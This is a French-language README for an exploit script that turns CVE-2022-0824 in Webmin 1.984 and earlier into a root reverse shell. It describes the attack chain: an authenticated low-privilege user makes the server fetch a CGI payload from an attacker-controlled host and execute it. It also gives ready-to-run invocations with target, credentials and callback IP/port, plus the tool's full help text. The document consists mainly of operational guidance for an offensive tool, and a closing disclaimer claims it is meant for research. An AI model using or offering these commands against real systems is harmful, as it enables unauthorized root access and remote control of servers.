
Exploit de shell inversé post-authentification pour Webmin <=1.984 exploitant la CVE-2022-0824, une élévation de privilèges dans le gestionnaire de fichiers. Télécharge et exécute une charge utile CGI pour obtenir un accès root.
Webmin 1.984 et versions inférieures - Exploitation des privilèges du gestionnaire de fichiers (CVE-2022-0824 et CVE-2022-0829)
Les utilisateurs Webmin moins privilégiés qui n'ont configuré aucune restriction du module Gestionnaire de fichiers peuvent accéder aux fichiers avec les privilèges root, s'ils utilisent le thème Authentic par défaut. Tous les systèmes avec des utilisateurs Webmin non fiables supplémentaires doivent être mis à jour immédiatement. Notez que les systèmes Virtualmin ne sont pas affectés par ce bogue, en raison de la manière dont les utilisateurs Webmin propriétaires de domaine sont configurés.
Source : https://www.webmin.com/security.html
Cet exploit tire parti de la vulnérabilité de contrôle d'accès inapproprié post-authentification dans le Gestionnaire de fichiers. Cet exploit peut être réalisé par tout attaquant authentifié moins privilégié. Il téléchargera un fichier .cgi à distance depuis un serveur contrôlé par l'attaquant et modifiera ses permissions pour en faire un fichier exécutable par tout le monde. Une fois cela fait, il exécutera le fichier .cgi pour établir une connexion inverse vers le serveur contrôlé par l'attaquant avec les privilèges root.
Référence : https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444
$~ python3 Webmin-revshell.py -h
usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]
Webmin CVE-2022-0824 Reverse Shell
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target full URL, https://www.webmin.local:10000
-c CREDENTIAL, --credential CREDENTIAL
Format, user:user123
-LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
Http server for serving payload, ex 192.168.5.120:8080
-L CALLBACK_IP, --callback_ip CALLBACK_IP
Callback IP to receive revshell
-P CALLBACK_PORT, --callback_port CALLBACK_PORT
Callback port to receive revshell
-V, --version show program's version number and exit
target host: https://192.168.5.118:10000
attacker host: 192.168.5.120
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3
Ce script est uniquement destiné à l'analyse de sécurité et à la recherche. Je ne saurais être tenu responsable s'il est utilisé pour des activités illicites.